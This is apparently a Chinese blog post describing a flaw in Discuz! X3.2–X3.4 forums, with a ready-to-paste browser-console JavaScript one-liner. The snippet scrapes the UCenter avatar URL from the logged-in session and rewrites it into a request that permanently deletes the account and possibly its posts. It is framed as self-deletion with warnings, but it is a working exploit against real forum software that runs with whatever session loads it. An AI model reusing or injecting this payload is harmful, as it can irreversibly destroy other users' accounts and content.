永久删除你在任何DZ论坛的帐号漏洞

Discuz! X 论坛的漏洞,Discuz!X3.4 X3.3 X3.2 永久删除帐号!通过调用网页控制台 Console 键入特定代码,执行代码后会先删除 UCenter 内的帐号,随后 UCenter 会通知 Discuz! 删除用户帐号。在第一时间对该漏洞进行验证,并成功删除了在某学习网论坛的账号!一个简单的教程,有需要的小伙伴可以参考一下,郑重提醒大家,此操作没有后悔药,请三思而后行!

警告

  • 此操作没有后悔药,谨慎操作!
  • 可能同时删除账号和该账号的帖子,也可能只删除账号,不可控!
  • 禁止对他人的账号执行此操作!

教程

▼ 进入欲删除账号的网站,登陆欲删除的账号
▼ 按 F12 打开控制台,点击「Console」,为了分便操作,先清空控制台,点击左上角‘禁止’按钮清空
▼ 复制以下代码到 Console 中,按下 Enter 键执行代码
location.href=((d=(await(await fetch("./home.php?mod=spacecp&ac=avatar",{credentials:'include'})).text()).match(/\/\/\S+\/images\/ca\S+&ag/g)[0].replace('images/camera.swf?','?m=user&a=delete&'))&&confirm('真的要[永久]删除你的 ID?'))?d:'';

或者

(async function(){location.href=((d=(await(await fetch("./home.php?mod=spacecp&ac=avatar",{credentials:'include'})).text()).match(/\/\/\S+\/images\/ca\S+&ag/g)[0].replace('images/camera.swf?','?m=user&a=delete&'))&&confirm('真的要[永久]删除你的 ID?'))?d:'';})()
▼ 弹出对话框,点击「确定」
*.部分浏览器可能会拦截对话框,请查看地址栏处是否有对话框被拦截
▼ 返回一个大于 0 的整数,删除账号成功,尝试登陆,失败
没有后悔药,谨慎操作

1、执行后,如果显示大于 0 的整数,说明帐号删除成功。
2、删除的是 UCenter 内的帐号,UCenter 会通知 Discuz! 删除用户帐号。
3、通知可能出现延迟,或不成功。因此可能不会立即登出网站。
4、如果通知最终成功,该帐号及其所有帖子都会从 Discuz! 中删除。
5、如果通知不成功,帐号登出后也将无法登录。此时可以注册一个新的同名帐号,覆盖原帐号。原帐号信息将被删除,其帖子将无法阅读(但不会删除)。


如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:永久删除你在任何 DZ 论坛的帐号漏洞
本文短地址:
喜欢 (0)
发表我的评论
取消评论

表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址